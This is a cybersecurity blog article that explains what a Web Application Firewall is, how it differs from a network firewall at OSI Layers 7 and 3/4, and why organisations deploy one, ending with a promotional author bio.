fbpx

What is WAF?

 
WAF stands for Web Application Firewall.
 
You already know that your network firewalls are there to protect your network from outside threats, in particular. However, you cannot defend so very well your web-facing applications with the network-firewalls.
 
Historically, most companies who were to comply with the PCI-DSS, were mandated to implement Web Application Firewalls (WAF). Typically if you were a retailer or a financial service provider you would already be using WAF. In recent years, this has changed, as most cybersecurity professionals are beginning to realize that they can no longer afford to miss out the deployment of a WAF. Because now they fully realize that their unprotected web-applications are attractive targets for cybercriminals who are looking for easy entry points into their networks.
 
You web applications are consistently facing Cross-site Scripting (XSS), SQL-Injection, Application Layer DoS attacks along with regular man-in-middle, cookies hijacking types of attacks. For example in case of XSS, flaws in both application-code and the devices they run on that allow these attacks to succeed, are actually quite widespread. Successful attacks can occur anywhere your web application uses input from a user to modify the output it generates without first validating or encoding it.
 
The fact is, securing application environments presents a unique and consistent challenge to your security teams.
 
Commercial code (of your web applications) can also be vulnerable to things like poor security hygiene, especially when a lack of resources inhibits your security team from applying patches and security fixes as soon as they’re available.
 
If you have thought that here we are dealing with your external web-facing applications only, then you are wrong. External web applications are only the half of the problem.
Your 'Internal' web applications are also the part of the problem. Especially, those that you have been design and developed by your in-house teams. Believe it or not, application developed in-house are more often considered to be even easier to attack or compromise, than your external apps, if attackers are able to gain access to your internal network. You might be thinking, WHY is it so?
  • Because CUSTOM code is traditionally one of the weakest security link to a lot of organizations...
  • Because your internal app development teams may or may not be up-to-date on all new types of cyber-attacks...
  • Because they may or may not do the sort of deep 'cross-application' vulnerability testing that commercial developers are able to do usually.
I have mentioned above that securing these applications is a unique challenge...
 
For example, if you have a web application by which you are taking online orders of purchase from your customers, it may be a single external application. But it may trigger dozens of your internal applications too, e.g., App for checking and restocking of your inventory, App for shipment handling, app for shipping labels, App for payment processing, App for invoicing, adding the purchase to your given customer's shopping history, App for emailing, and so on...
 
Not only can these individual applications potentially be exploited, but sometimes modifying a shared library, or even changing the order in which subsequent applications occur, can open a vulnerability to be exploited.
 
These sorts of attacks may be notoriously problematic for your organization, if you mistakenly believe that your perimeter defense systems (read, Firewalls) has you fully protected. The reality is that a perimeter breach is simply a matter of time. The most effective place to start with any application security strategy is to assume that your perimeter defenses will be compromised.
 
That's why deploying a Web Application Firewall makes a great sense to all organizations.
 
👉 How is WAF different from Network Firewall?
 
Remember that a WAF protects your web applications by targeting HTTP/HTTPS traffic. It is different from a standard firewall, which provides a barrier between 'external' and 'internal' network traffic.
 
Your WAF sits between your external users and your web applications to analyze all HTTP communication. It then detects and blocks malicious requests before they reach your users or web applications. As a result, WAFs secure your 'business-critical' web applications and web servers from zero-day threats and other application-layer attacks. This is extremely important as your company may be expanding into new digital initiatives, which can leave your new web applications and APIs vulnerable to cyber-attacks.
 
Contrarily, your network firewall protects your secured local-area network (LAN) from unauthorized access to prevent the risk of attacks. Its primary objective is to separate a secured zone from a less secure zone and to control communications between the two. Without it, any computer with a public Internet Protocol (IP) address is accessible outside the network and potentially at risk of attack. Firewall policies define the traffic allowed onto the network, and any other access attempts are blocked.
 
A WAF specifically targets application traffic.
-

👉  Layer 7 vs Layer 3/4

Let us now understand the difference from technical point of view...
 
The biggest and key technical difference between WAF and network-level firewall, is the layer of security they operate on.
 
WAF protects attacks at Layer 7 of OSI model, which is the application level. That's why, it includes all attacks against applications like Ajax, ActiveX, and JavaScript, as well as cookie manipulation, SQL injection, and URL attacks. Your WAF also targets web application protocols HTTP and HTTPS, which are used to connect web-browsers and web-servers.
 
For example, a Layer 7 DDoS attack sends a flood of traffic to the server layer where web-pages are generated and delivered in response to HTTP/HTTPS requests. Your WAF mitigates this by acting as a 'reverse proxy' that protects the targeted server from malicious traffic and filters requests to identify the use of DDoS tools.
 
Network firewalls operate at Layers 3 and 4 of OSI model, which protect data-transfer and network traffic. That's why, it includes attacks against the Domain Name System (DNS) and File Transfer Protocol (FTP), as well as Simple Mail Transfer Protocol (SMTP), Secure Shell (SSH), and Telnet, etc.
 

👉 What Can You Do To Protect Your Web-Applications?

 
Though you can begin by reviewing the OWASP Top 10 list that tracks the most common application attacks.
 
Your WAF protects your businesses from web-based attacks targeted at your applications. Without an application firewall, hackers could infiltrate your broader network through web application vulnerabilities.
 
However, Your network-firewalls protect against 'unauthorized access' and traffic going 'in' and 'out' of your network. They protect against network-wide attacks against your devices and systems that connect to the internet. For example, your network-firewall can protect your against unauthorized access, man-in-the-middle attacks, Privilege Escalation etc. This is something your WAF cannot do.
 
Your WAF and Network-Firewalls are two-different things altogether! So rather than competing, they complement each other.
 
Rather than selecting one or the other, your challenge is more to select the right WAF system that best suits your business’s needs. The WAF should have a hardware accelerator, monitor traffic and block malicious attempts, be highly available, and be scalable to maintain performance as the business grows.
 
You need latest threat-intel too. So it is critical that you deploy a WAF solution that not only address the most common threats, but that can also leverage such things as IP reputation services and that receives regular feeds and updates from a global threat service.
 
Additionally, many web application security solutions offer a correlation engine that pulls and analyzes multiple events across all security layers. This approach enables you to expand visibility across your entire environment, and automatically combine 'local' and 'global' threat intelligence to make more accurate decisions to better protect your organization.
 
This is the point where Next-Gen Firewalls (NGFWs) are a great help. Most modern NGFWs typically combine the capabilities of both -- your network firewalls and WAFs into a centrally managed system. They also provide extra context to security policies, which is vital to protect your business from modern security threats.
 
However, it is vital to you to ensure that your NGFW (if you have one) covers all the bases for network and web application protection.
 
Vulnerability scanning is another critical element for your organisation to stay protected. You need to understand which devices you have deployed across your network, what operating systems and current patches are loaded on them, and which applications run on or pass through them.
 
-
 
Kindly write 💚 your comment 💚 on the posts or topics, because when you do that you help me greatly in ✍️ designing new quality article/post on cybersecurity.
 
You can also share with all of us if the information shared here helps you in some manner.
 
Life is small and make the most of it!
Also take care of yourself and your beloved ones…
 
With thanks,
Meena R.
_______

This Article Was Written & published by Meena R,  Senior Manager - IT, at Luminis Consulting Services Pvt. Ltd, India. 

Over the past 16 years, Meena has built a following of IT professionals, particularly in Cybersecurity, Cisco Technologies, and Networking...

She is so obsessed with Cybersecurity domain that she is going out of her way and sharing hugely valuable posts and writings about Cybersecurity on website, and social media platforms. 

34,000+ professionals are following her on Facebook and mesmerized by the quality of content of her posts on Facebook. 

If you haven't yet been touched by her enthusiastic work of sharing quality info about Cybersecurity, then you can follow her on Facebook:

Click Here to follow her: Cybersecurity PRISM